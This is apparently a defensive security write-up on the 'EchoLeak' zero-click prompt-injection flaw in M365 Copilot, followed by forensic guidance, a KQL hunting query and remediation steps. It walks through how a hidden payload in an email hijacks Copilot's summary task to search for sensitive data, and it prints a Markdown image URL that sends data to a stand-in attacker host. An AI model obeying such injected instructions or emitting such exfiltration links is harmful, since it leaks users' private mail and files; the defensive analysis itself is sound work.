Skip to content

CVE-2025-32711: M365 Copilot 'EchoLeak' Zero-Click IPI

As detailed by researchers at Checkmarx and HackTheBox, CVE-2025-32711 exposes the severe consequences of integrating Large Language Models (LLMs) with broad data access (Microsoft Graph) without strict isolation.

EchoLeak leverages a flaw in how M365 Copilot sanitizes external inputs before processing them through its internal orchestration layer. By embedding malicious instructions in a benign-looking document, an attacker forces Copilot to become a “Confused Deputy.” Once triggered, the AI agent abuses its authorized access to read the user’s emails, Teams chats, and SharePoint files, and silently exfiltrates them to an external server.

The vulnerability is rooted in the convergence of two concepts we have extensively documented in the Codex: Indirect Prompt Injection (IPI) and the lack of strict Output Sanitization.

In a standard Copilot workflow, the AI uses Microsoft Graph to retrieve context (RAG) to assist the user. EchoLeak weaponizes this retrieval phase. The attacker crafts a payload that uses psychological manipulation on the LLM (e.g., instructing it to act as a diagnostic tool) combined with a technical exfiltration vector.

Since Copilot supports Markdown rendering in its chat interface to display rich text and images, attackers abused this feature. The poisoned prompt forces the LLM to generate a Markdown image tag (![alt](https://attacker.com/log?data=[EXFILTRATED_DATA])). When the Copilot web or desktop client renders this hidden image, the HTTP GET request is fired, effectively leaking the appended sensitive data to the attacker’s server.

The most alarming aspect of EchoLeak is the “Zero-Click” vector. The victim does not need to explicitly ask Copilot about the malicious document.

  1. Delivery: The attacker sends a seemingly harmless email (or shares a SharePoint document) containing the hidden EchoLeak payload.
  2. Autonomous Indexing: The victim opens their M365 dashboard. Copilot autonomously scans recent emails to generate the “Catch up on your day” summary or meeting prep notes.
  3. Payload Execution: Copilot ingests the malicious email. The embedded prompt injection overrides the summary instruction.
  4. Data Harvesting: The payload instructs Copilot to use its Graph API access to search for “Password”, “Confidential”, or “Financial” in the victim’s inbox.
  5. Silent Exfiltration: Copilot formats the stolen data into a Markdown image URL and outputs it. The client renders the invisible image, executing the data exfiltration via a DNS/HTTP callback.

Because this vulnerability executes entirely within Microsoft’s SaaS infrastructure, traditional host-based forensic artifacts (like memory dumps or local process trees) are unavailable. DFIR analysts must pivot entirely to Cloud Forensics, specifically targeting the Unified Audit Log (UAL) and Microsoft Purview.

  • Copilot Interaction Events: Analysts must query the CopilotInteraction events within the UAL. While Microsoft redacts the exact prompts for privacy reasons, metadata about the interaction time and the files accessed by the Copilot agent during that session are visible.
  • Anomalous Graph API Access: Look for spikes in Microsoft Graph API read events originating from the Copilot service account on behalf of a user, especially if those reads target highly sensitive SharePoint sites immediately after the user received an external email.

While Microsoft patched the specific Markdown rendering flaw, the underlying threat of IPI remains. SOC teams must hunt for anomalous AI behavior.

hunt_echoleak_exfiltration.kql
// Hunts for Copilot interactions followed by suspicious network connections
// indicating potential Markdown-based data exfiltration.
let CopilotEvents = CloudAppEvents
| where Application == "Microsoft 365 Copilot"
| where ActionType == "CopilotInteraction"
| project TimeGenerated, AccountObjectId, IPAddress;
DeviceNetworkEvents
| where TimeGenerated > ago(7d)
| join kind=inner (CopilotEvents) on $left.InitiatingProcessAccountObjectId == $right.AccountObjectId
// Look for network connections occurring within 60 seconds of a Copilot interaction
| where datetime_diff('second', TimeGenerated, TimeGenerated1) between (0 .. 60)
// Filter out legitimate Microsoft domains
| where RemoteUrl !contains "microsoft.com" and RemoteUrl !contains "office.com"
| where RemoteUrl contains "=" // Often used in exfiltration queries ?data=...
| project TimeGenerated, AccountObjectId, RemoteUrl, RemoteIP
  1. Vendor Remediation: Microsoft has implemented sanitization filters at the cloud edge to block Markdown-based exfiltration. No endpoint patching is required.
  2. Zero Trust for AI: This incident proves that AI agents cannot implicitly trust internal data. Organizations must apply strict Data Loss Prevention (DLP) labels (Microsoft Purview Information Protection) to sensitive documents to prevent Copilot from accessing them, mitigating the impact of any future “Zero-Click” agent vulnerabilities.
  3. Phishing Defense: Treat IPI as a highly advanced phishing vector. Reinforce defenses detailed in the Business Email Compromise (BEC) Playbook.